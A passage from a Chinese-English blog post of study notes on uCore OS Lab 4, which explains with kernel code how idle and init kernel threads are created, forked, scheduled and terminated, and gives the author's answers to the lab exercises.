class="built_in">panic</span>(<span class="string">&quot;cannot alloc idleproc.\n&quot;</span>);</span><br><span class="line"><span class="comment">// 该空闲进程作为第一个进程，pid为0</span></span><br><span class="line">idleproc-&gt;pid = <span class="number">0</span>;</span><br><span class="line"><span class="comment">// 设置该空闲进程始终可运行</span></span><br><span class="line">idleproc-&gt;state = PROC_RUNNABLE;</span><br><span class="line"><span class="comment">// 设置空闲进程的内核栈</span></span><br><span class="line">idleproc-&gt;kstack = (<span class="type">uintptr_t</span>)bootstack;</span><br><span class="line"><span class="comment">// 设置该空闲进程为可调度</span></span><br><span class="line">idleproc-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line"><span class="built_in">set_proc_name</span>(idleproc, <span class="string">&quot;idle&quot;</span>);</span><br><span class="line">nr_process++;</span><br><span class="line"><span class="comment">// 设置当前运行的进程为该空闲进程</span></span><br><span class="line">current = idleproc;</span><br></pre></td></tr></table></figure></li></ul><h5 id="b-第一个内核进程的创建">b. 
Creating the first kernel process</h5><ul><li><p>The first kernel process is the parent or ancestor of every process created afterwards.</p></li><li><p>The uCore code that creates the first kernel process is shown below.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// create the main thread of init</span></span><br><span class="line"><span class="type">int</span> pid = <span class="built_in">kernel_thread</span>(init_main, <span class="string">&quot;Hello world!!&quot;</span>, <span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (pid &lt;= <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;create init_main failed.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// look up the proc_struct by pid</span></span><br><span class="line">initproc = <span class="built_in">find_proc</span>(pid);</span><br><span class="line"><span class="built_in">set_proc_name</span>(initproc, <span class="string">&quot;init&quot;</span>);</span><br></pre></td></tr></table></figure></li><li><p>In <code>kernel_thread</code>, the code first fills in a <code>trapframe</code> and finally calls <code>do_fork</code>. Note that the <code>ebx</code>, <code>edx</code> and <code>eip</code> registers in this <code>trapframe</code> are set to the <strong>address of the target function</strong>, the <strong>argument pointer</strong>, and the address of <strong>kernel_thread_entry</strong> respectively (covered below).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">kernel_thread</span><span class="params">(<span class="type">int</span> (*fn)(<span class="type">void</span> *), <span class="type">void</span> *arg, <span class="type">uint32_t</span> clone_flags)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> tf;</span><br><span class="line">    <span class="built_in">memset</span>(&amp;tf, <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe));</span><br><span class="line">    tf.tf_cs = KERNEL_CS;</span><br><span class="line">    tf.tf_ds = tf.tf_es = tf.tf_ss = KERNEL_DS;</span><br><span class="line">    <span class="comment">// ebx = fn</span></span><br><span class="line">    tf.tf_regs.reg_ebx = (<span class="type">uint32_t</span>)fn;</span><br><span class="line">    <span class="comment">// edx = arg</span></span><br><span class="line">    tf.tf_regs.reg_edx = (<span class="type">uint32_t</span>)arg;</span><br><span class="line">    <span class="comment">// eip = kernel_thread_entry</span></span><br><span class="line">    tf.tf_eip = (<span class="type">uint32_t</span>)kernel_thread_entry;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">do_fork</span>(clone_flags | CLONE_VM, <span class="number">0</span>, &amp;tf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>do_fork</code> performs the following steps:</p><ul><li>Allocate a PCB for the new process and fill in its fields, including the address of the parent's PCB, the address of the new kernel stack, the new PID, and so on.</li><li>Copy the current process's address space into the child, or share it with the child, depending on <code>clone_flags</code>.</li><li>Copy the current thread's context state into the child.</li><li>Insert the child's PCB into both the ordinary doubly linked list and the hash table, mark the child as runnable, and finally return the child's PID.</li></ul><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_NO_FREE_PROC;</span><br><span class="line">    <span class="keyword">struct</span> <span 
class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="keyword">if</span> (nr_process &gt;= MAX_PROCESS)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 首先分配一个PCB</span></span><br><span class="line">    <span class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    <span class="comment">// fork肯定存在父进程，所以设置子进程的父进程</span></span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="comment">// 分配内核栈</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    <span class="comment">// 将所有虚拟页数据复制过去</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    <span class="comment">// 复制线程的状态，包括寄存器上下文等等</span></span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line">    <span class="comment">// 将子进程的PCB添加进hash list或者list</span></span><br><span class="line">    <span class="comment">// 需要注意的是，不能让中断处理程序打断这一步操作</span></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span 
class="line">        proc-&gt;pid = <span class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">list_add</span>(&amp;proc_list, &amp;(proc-&gt;list_link));</span><br><span class="line">        nr_process ++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// mark the new child as runnable</span></span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">    <span class="comment">// return the pid of the child</span></span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line"></span><br><span class="line">fork_out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">bad_fork_cleanup_kstack:</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">bad_fork_cleanup_proc:</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">goto</span> fork_out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The <code>copy_thread</code> function called from <code>do_fork</code> performs the following steps:</p><ul><li><p>It copies the <code>trapframe</code> built in <code>kernel_thread</code> to the top of the new process's own kernel stack and points the <code>tf</code> member of <code>proc</code> at that copy.</p></li><li><p>It sets the <code>eax</code> register in the <code>trapframe</code> to 0, sets the <code>esp</code> register to the <code>esp</code> value passed in, and turns on the interrupt flag in <code>eflags</code>.</p><blockquote><p><code>eax</code> is set to 0 because <code>fork</code> returns 0 in the child.</p></blockquote></li><li><p>Finally, it sets the <code>eip</code> of the child's context to <code>forkret</code> and its <code>esp</code> to the address of that <code>trapframe</code>.</p></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">copy_thread</span><span class="params">(<span class="keyword">struct</span> proc_struct *proc, <span class="type">uintptr_t</span> esp, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    proc-&gt;tf = (<span class="keyword">struct</span> trapframe *)(proc-&gt;kstack + KSTACKSIZE) - <span class="number">1</span>;</span><br><span class="line">    *(proc-&gt;tf) = *tf;</span><br><span class="line">    proc-&gt;tf-&gt;tf_regs.reg_eax = <span class="number">0</span>;</span><br><span class="line">    proc-&gt;tf-&gt;tf_esp = esp;</span><br><span class="line">    proc-&gt;tf-&gt;tf_eflags |= FL_IF;</span><br><span class="line"></span><br><span class="line">    proc-&gt;context.eip = (<span class="type">uintptr_t</span>)forkret;</span><br><span class="line">    proc-&gt;context.esp = (<span class="type">uintptr_t</span>)(proc-&gt;tf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>当该子进程被调度运行，上下文切换后（即此时current为该子进程的PCB地址），子进程会跳转至<code>forkret</code>，而该函数是<code>forkrets</code>的一个wrapper。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">forkret</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    
forkrets(current-&gt;tf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>What does <code>forkrets</code> do? It restores the context from <code>current-&gt;tf</code> and jumps to <code>current-&gt;tf-&gt;tf_eip</code>, which is <code>kernel_thread_entry</code>.</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">    # return falls through to trapret...</span><br><span class="line"><span class="meta">.globl</span> __trapret</span><br><span class="line"><span class="symbol">__trapret:</span></span><br><span class="line">    # restore registers from stack</span><br><span class="line">    popal</span><br><span class="line"></span><br><span class="line">    # restore %ds, %es, %fs <span class="keyword">and</span> %gs</span><br><span class="line">    popl %gs</span><br><span class="line">    popl %fs</span><br><span class="line">    popl %es</span><br><span class="line">    popl %ds</span><br><span class="line"></span><br><span class="line">    # get rid of the trap number <span class="keyword">and</span> error code</span><br><span class="line">    addl <span class="number">$0</span>x8, %esp</span><br><span class="line">    <span class="keyword">iret</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span 
class="meta">.globl</span> forkrets</span><br><span class="line"><span class="symbol">forkrets:</span></span><br><span class="line">    # set stack to this new process&#x27;s trapframe</span><br><span class="line">    movl 4(%esp), %esp</span><br><span class="line">    jmp __trapret</span><br></pre></td></tr></table></figure></li><li><p>The code of <code>kernel_thread_entry</code> is very simple: it pushes the value of <code>%edx</code> as the argument, calls the code that <code>%ebx</code> points to, then pushes the return value of that function and calls <code>do_exit</code>.</p><p>Taking <code>initproc</code> as an example, <code>%edx</code> at this point holds the address of the string <code>&quot;Hello world!!&quot;</code>, and <code>%ebx</code> holds the address of the <code>init_main</code> function.</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">.text</span></span><br><span class="line"><span class="meta">.globl</span> kernel_thread_entry</span><br><span class="line"><span class="symbol">kernel_thread_entry:</span>        # void kernel_thread(void)</span><br><span class="line"></span><br><span class="line">    pushl %edx              # <span class="keyword">push</span> arg</span><br><span class="line">    <span class="keyword">call</span> *%ebx              # <span class="keyword">call</span> fn</span><br><span class="line"></span><br><span class="line">    pushl %eax              # save the return value of fn(arg)</span><br><span class="line">    <span class="keyword">call</span> do_exit            # <span class="keyword">call</span> do_exit to terminate current 
thread</span><br></pre></td></tr></table></figure><blockquote><p><code>kernel_thread</code> makes the control flow start at <code>kernel_thread_entry</code> so that a kernel process <strong>automatically calls <code>do_exit</code> to release its resources</strong> once its function has finished.</p></blockquote></li></ul><h4 id="3-进程终止">3) Process termination</h4><p>Only the <strong>orderly termination</strong> of a process is covered briefly here.</p><ul><li>When a process finishes it calls <code>exit()</code>, which reclaims the resources of the process.</li><li>What the <code>exit</code> call does:<ul><li>Records its argument as the "result" of the process.</li><li>Closes all open files and releases other resources held by the process.</li><li>Frees memory.</li><li>Frees most of the kernel data structures associated with the process.</li><li>Checks whether the parent process is still alive.<ul><li>If it is, the result value is kept until the parent collects it, and the current process enters the zombie state.</li><li>If it is not, all data structures are freed and the process ends.</li></ul></li><li>Reaps any zombie processes that are waiting.</li></ul></li><li>Process termination is the final round of garbage collection (resource reclamation).</li></ul><h2 id="练习解答">Exercise answers</h2><h3 id="1-练习1">1) Exercise 1</h3><blockquote><p><strong>Allocate and initialize a process control block.</strong></p><p>The alloc_proc function (in kern/process/proc.c) allocates and returns a new struct proc_struct, which stores the management information of a newly created kernel thread. ucore has to perform the most basic initialization of this structure, and you need to complete that initialization.</p></blockquote><p>The implementation is shown below.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> * <span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span 
class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">    <span class="comment">//LAB4:EXERCISE1 YOUR CODE</span></span><br><span class="line">        proc-&gt;state = PROC_UNINIT;</span><br><span class="line">        proc-&gt;pid = <span class="number">-1</span>;</span><br><span class="line">        proc-&gt;runs = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;kstack = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;parent = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="built_in">memset</span>(&amp;(proc-&gt;context), <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> context));</span><br><span class="line">        proc-&gt;tf = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;cr3 = boot_cr3;</span><br><span class="line">        proc-&gt;flags = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">memset</span>(proc-&gt;name, <span class="number">0</span>, PROC_NAME_LEN);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li>What do the <code>struct context context</code> and <code>struct trapframe *tf</code> members of proc_struct mean, and what role do they play in this lab?<ul><li><p><code>struct context context</code>: stores the current state of the process and is used to save and restore the context during a process switch.</p><p>Note that, unlike the <code>trapframe</code>, which holds the context saved on entry to the kernel, <code>context</code> holds the thread's <strong>current</strong> context at the moment it is switched out. Because <code>switch_to</code> runs inside the kernel, this is kernel-side execution state, whether the thread had been running user code or kernel code before it entered the kernel.</p></li><li><p><code>struct trapframe* 
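tf</code>: whether a user program entered the kernel through a system call or a thread was created inside the kernel, the context that a thread in kernel mode loads when it performs an interrupt return is <code>struct trapframe* tf</code>. A thread created inside the kernel therefore has to forge a <code>trapframe</code> in order to make that return. (In this lab the forged frame uses <code>KERNEL_CS</code>, so the return lands in <code>kernel_thread_entry</code> in kernel mode rather than in user code.)</p><blockquote><p>Recall that entering the kernel from user mode pushes the user-mode context at that moment as a <code>trapframe</code>.</p></blockquote></li><li><p>How the two relate: take <code>kernel_thread</code> as an example. Although that function builds the trapframe that ends up in <code>proc-&gt;tf</code>, the <code>copy_thread</code> function called from <code>do_fork</code> additionally sets up <code>proc-&gt;context</code>. Keeping two <strong>contexts</strong> may look redundant, but they do different jobs.</p><p>Processes hand control to each other through scheduling. When a newly forked process first gets the CPU, the first code it executes is the code that <code>current-&gt;context.eip</code> points to. At that point the new process is still in kernel mode, but what we ultimately want is to run its own code, so it has to leave the kernel through an interrupt return. Two questions come up here:</p><ul><li><strong>How does the new process perform the interrupt return?</strong> This is what <code>proc-&gt;context.eip = (uintptr_t)forkret</code> is for. <code>forkret</code> makes the new process return correctly through the interrupt-return path.</li><li><strong>What context does the new process have after the interrupt return?</strong> This is what <code>proc_struct-&gt;tf</code> is for. On the interrupt return, the new process restores the saved <code>trapframe</code> into the registers and then starts executing its code.</li></ul></li></ul></li></ul><h3 id="2-练习2">2) Exercise 2</h3><blockquote><p><strong>Allocate resources for the newly created kernel thread</strong></p><p>do_fork creates a copy of the current kernel thread. The two have the same execution context, code and data, but are stored in different places. In the process, resources have to be allocated for the new kernel thread and the state of the original process has to be copied.</p></blockquote><p>The implementation is shown below, with the details written as comments in the code:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span 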
class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_NO_FREE_PROC;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="keyword">if</span> (nr_process &gt;= MAX_PROCESS) &#123;</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    &#125;</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line">    <span class="comment">//LAB4:EXERCISE2 YOUR CODE</span></span><br><span class="line">    <span class="comment">// 首先分配一个PCB</span></span><br><span class="line">    <span class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    <span class="comment">// 
fork肯定存在父进程，所以设置子进程的父进程</span></span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="comment">// 分配内核栈</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    <span class="comment">// 将所有虚拟页数据复制过去</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    <span class="comment">// 复制线程的状态，包括寄存器上下文等等</span></span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line">    <span class="comment">// 将子进程的PCB添加进hash list或者list</span></span><br><span class="line">    <span class="comment">// 需要注意的是，不能让中断处理程序打断这一步操作</span></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc-&gt;pid = <span class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">list_add</span>(&amp;proc_list, &amp;(proc-&gt;list_link));</span><br><span class="line">        nr_process ++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 设置新的子进程可执行</span></span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">    <span class="comment">// 
return the pid of the child</span></span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line"></span><br><span class="line">fork_out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line"></span><br><span class="line">bad_fork_cleanup_kstack:</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">bad_fork_cleanup_proc:</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">goto</span> fork_out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>Does ucore give every newly forked thread a unique id? Explain your analysis and reasoning.</p><blockquote><p>I honestly had not planned to study <code>get_pid</code> at all; who knew it would turn up as an exercise question T_T.</p></blockquote><p>In uCore every newly forked thread does get a unique ID, for the following reasons:</p><ul><li><p>In <code>get_pid</code>, if the static variable <code>last_pid</code> is less than <code>next_safe</code>, the <code>last_pid</code> being handed out is guaranteed to be safe, that is, a unique PID.</p></li><li><p>If <code>last_pid</code> is greater than or equal to <code>next_safe</code>, or <code>last_pid</code> has reached <code>MAX_PID</code>, the current <code>last_pid</code> is not necessarily unique. In that case the function walks <code>proc_list</code> and recomputes <code>last_pid</code> and <code>next_safe</code>, which also prepares the ground for the next call to <code>get_pid</code>.</p></li><li><p>The function maintains a range of known-free <code>PID</code>s in order to <strong>save time</strong>. A plain brute-force search would have to scan most PIDs against every thread, which is expensive, so the <code>PID</code> range is used as an optimization.</p></li><li><p>The code of <code>get_pid</code> is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// get_pid - alloc a unique pid for process</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">get_pid</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">static_assert</span>(MAX_PID &gt; MAX_PROCESS);</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="type">list_entry_t</span> *list = &amp;proc_list, *le;</span><br><span class="line">    <span class="type">static</span> <span class="type">int</span> next_safe = MAX_PID, last_pid = MAX_PID;</span><br><span class="line">    <span class="keyword">if</span> (++ last_pid &gt;= MAX_PID) &#123;</span><br><span class="line">        last_pid = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">goto</span> inside;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (last_pid &gt;= next_safe) &#123;</span><br><span class="line">    inside:</span><br><span class="line">        next_safe = MAX_PID;</span><br><span class="line">    repeat:</span><br><span class="line">        le = 
list;</span><br><span class="line">        <span class="keyword">while</span> ((le = <span class="built_in">list_next</span>(le)) != list) &#123;</span><br><span class="line">            proc = <span class="built_in">le2proc</span>(le, list_link);</span><br><span class="line">            <span class="keyword">if</span> (proc-&gt;pid == last_pid) &#123;</span><br><span class="line">                <span class="keyword">if</span> (++ last_pid &gt;= next_safe) &#123;</span><br><span class="line">                    <span class="keyword">if</span> (last_pid &gt;= MAX_PID)</span><br><span class="line">                        last_pid = <span class="number">1</span>;</span><br><span class="line">                    next_safe = MAX_PID;</span><br><span class="line">                    <span class="keyword">goto</span> repeat;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> (proc-&gt;pid &gt; last_pid &amp;&amp; next_safe &gt; proc-&gt;pid)</span><br><span class="line">                next_safe = proc-&gt;pid;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> last_pid;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="3-练习3">3) Exercise 3</h3><blockquote><p><strong>Read the code and understand how proc_run and the functions it calls perform a process switch.</strong></p></blockquote><p>See <a href="#c-%E5%88%87%E6%8D%A2%E6%B5%81%E7%A8%8B">the switching flow</a>.</p><ul><li>How many kernel threads are created and run during this lab?<ul><li>Two kernel threads: <code>idleproc</code> and <code>initproc</code>.</li><li>For more on <code>idleproc</code> and <code>initproc</code>, see <a href="#a-%E7%A9%BA%E9%97%B2%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%88%9B%E5%BB%BA">creating idleproc</a> and <a 
href="#b-%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%86%85%E6%A0%B8%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%88%9B%E5%BB%BA">creating initproc</a>.</li></ul></li><li>What do the statements <code>local_intr_save(intr_flag);....local_intr_restore(intr_flag);</code> do here? Explain why.<ul><li>The first statement <strong>disables interrupts</strong>, remembering in <code>intr_flag</code> whether they were enabled, and the second <strong>restores the saved interrupt state</strong>.</li><li>Used together, they turn the code between them into an <strong>atomic operation</strong>: critical code cannot be interrupted, which avoids unexpected errors and race conditions.</li><li>Take process switching as an example. In <code>proc_run</code>, right after <code>current</code> has been pointed at the next process but before control has been fully transferred, an interrupt arriving at that moment could make the interrupt handler misbehave, because the process that <code>current</code> points to does not match the process resources actually in use.</li></ul></li></ul><h3 id="4-扩展练习">4) Challenge Exercise</h3><blockquote><p><strong>Implement a memory allocation algorithm that supports arbitrary sizes</strong></p><p>Since the current slab algorithm is fairly complex, it is worth implementing a simpler arbitrary-size allocator. Look at how the slab allocator in this lab calls the page-based allocator, and use it as a reference for implementing an arbitrary-size allocator such as first-fit/best-fit/worst-fit/buddy.</p></blockquote><blockquote><p>Postponed for now; to be added later.</p></blockquote>]]></content>
    
    
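    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are notes I wrote while working through &lt;code&gt;uCore&lt;/code&gt; Lab 4.&lt;/li&gt;
&lt;li&gt;They cover process and thread management, among other topics.&lt;/li&gt;
&lt;li&gt;The post is long, so using the navigation bar on the right is recommended.&lt;/li&gt;
&lt;/ul&gt;</summary>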
